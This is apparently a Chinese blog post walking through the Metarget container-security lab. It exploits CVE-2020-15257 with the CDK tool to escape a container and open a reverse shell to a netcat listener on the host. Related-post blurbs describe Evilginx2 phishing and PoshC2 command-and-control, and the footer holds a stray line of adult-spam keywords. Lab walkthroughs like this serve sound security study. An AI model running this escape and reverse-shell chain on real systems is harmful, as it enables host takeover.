<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Metarget的實踐(一)

    VSole2021-10-23 04:47:25

    Metarget是一個開源的容器安全靶機項目,經過驗證很方便搭建模擬靶機環境,如下是驗證記錄,

    使用ubuntu18.04,下載項目源碼,

    git clone https://github.com/Metarget/metarget.git,

    安裝pip3,sudo apt install python3-pip,

    安裝環境軟件,cd metarget,pip3 install -r requirements.txt,

    接著就可以創建自己需要的靶機了,

    以cve-2020-15257為例,參考鏈接,

    https://github.com/Metarget/metarget/tree/master/writeups_cnv/docker-containerd-cve-2020-15257,

    安裝,./metarget cnv install cve-2020-15257,發現抱錯,

    加個參數,看看問題是啥,

    ./metarget cnv install cve-2020-15257 --verbose,

    原來是權限問題,需要給root權限,重新來過,

    sudo ./metarget cnv install cve-2020-15257,

    等一會兒就安裝成功了,接著做攻擊實驗,

    拉起一個靶機容器,

    sudo docker run -it --net=host --name=15257 ubuntu /bin/bash,

    可以查看不安全套接字,cat /proc/net/unix|grep -a "containerd-shim",

    還是攻擊更能看效果,先給容器靶機安裝個netcat,

    apt update,apt install netcat,開啟個端口監聽,nc -lnvp 1234,

    回到宿主機,下載漏洞利用軟件,CDK,

    wget https://github.com/cdk-team/CDK/releases/download/v1.0.4/cdk_linux_amd64,

    把CDK拷貝到靶機容器,sudo docker cp cdk_linux_amd64 15257:/tmp,

    再次進入靶機容器,sudo docker exec -it 15257 bash,

    修改CDK文件的權限,cd /tmp,chmod +x cdk_linux_amd64,

    執行CDK,進行漏洞利用,開始逃逸,

    ./cdk_linux_amd64 run shim-pwn reverse 10.90.11.162 1234,

    端口監聽那邊就拿到宿主機的shell了,

    sudoinstall
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    虛機ubuntu20.04, 安裝docker, sudo apt install docker.io, sudo systemctl enable docker, sudo gpasswd -a ubuntu docker, newgrp docker, 安裝docker-compose, sudo apt install docker-compose, 給harbor起個本地域
    harbor2.5版本開始支持cosign做鏡像簽名,本周實踐了一下, ubuntu20.04.4,安裝docker,sudo apt install docker.io, sudo systemctl enable docker, sudo gpasswd -a ubuntu docker, newgrp docker, 安裝docker-compose,sudo apt instal
    工作需要,本周安裝了vmware-tanzu社區版,記錄如下, all in one,ubuntu20.04, sudo apt update, sudo apt dist-upgrade, 安裝docker, sudo apt install docker.io, sudo systemctl enable docker, sudo gpasswd -a ubuntu docker
    推薦一款自動向hackerone發送漏洞報告的掃描器?編輯 dotenv 文件, 請務必更改 postgresql POSTGRES_PASSWORD 的密碼!運行安裝腳本,請留意任何提示,您還將被要求輸入 reNgine 的用戶名和密碼。
    一款自動向hackerone報送報告的工具
    Evilginx2介紹 evilginx2是一個中間人攻擊框架,用于網絡釣魚登錄憑據以及會話cookie,從而允許繞過雙因素身份驗證保護。Evilginx2用途聲明我非常清楚Evilginx2可以用于惡意目的。防御者有責任考慮此類攻擊并找到保護其用戶免受此類網絡釣魚攻擊的方法。Evilginx只能在合法滲透測試任務中使用,并且必須得到被破壞方的書面許可。需要一個外部服務器,在其中托管evilginx2安裝。
    C2 框架Tools
    2022-08-03 06:32:51
    PoshC2 主要是用 Python3 編寫的,遵循模塊化格式,使用戶能夠添加自己的模塊和工具,從而實現可擴展且靈活的 C2 框架。PoshC2 的其他顯著特點包括:使用 Docker 提供一致的跨平臺支持。
    神兵利器 - C2 框架
    2022-04-10 07:33:31
    PoshC2 主要是用 Python3 編寫的,遵循模塊化格式,使用戶能夠添加自己的模塊和工具,從而實現可擴展且靈活的 C2 框架。開箱即用的 PoshC2 帶有 PowerShell/C# 和 Python2/Python3 植入物,除了 Python2/Python3 有效負載外,還有用 PowerShell v2 和 v4、C++ 和 C# 源代碼、各種可執行文件、DLL 和原始 shell
    首先對ubuntu進行端口掃描,發現開了21、22、80、888、3306、8888端口
    sudo mv /etc/apt/sources.list /etc/apt/sources.list.bak, sudo vim /etc/apt/sources.list, deb http://mirrors.aliyun.com/ubuntu/ bionic main restricted universe multiverse deb-src http://mirrors.aliy
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类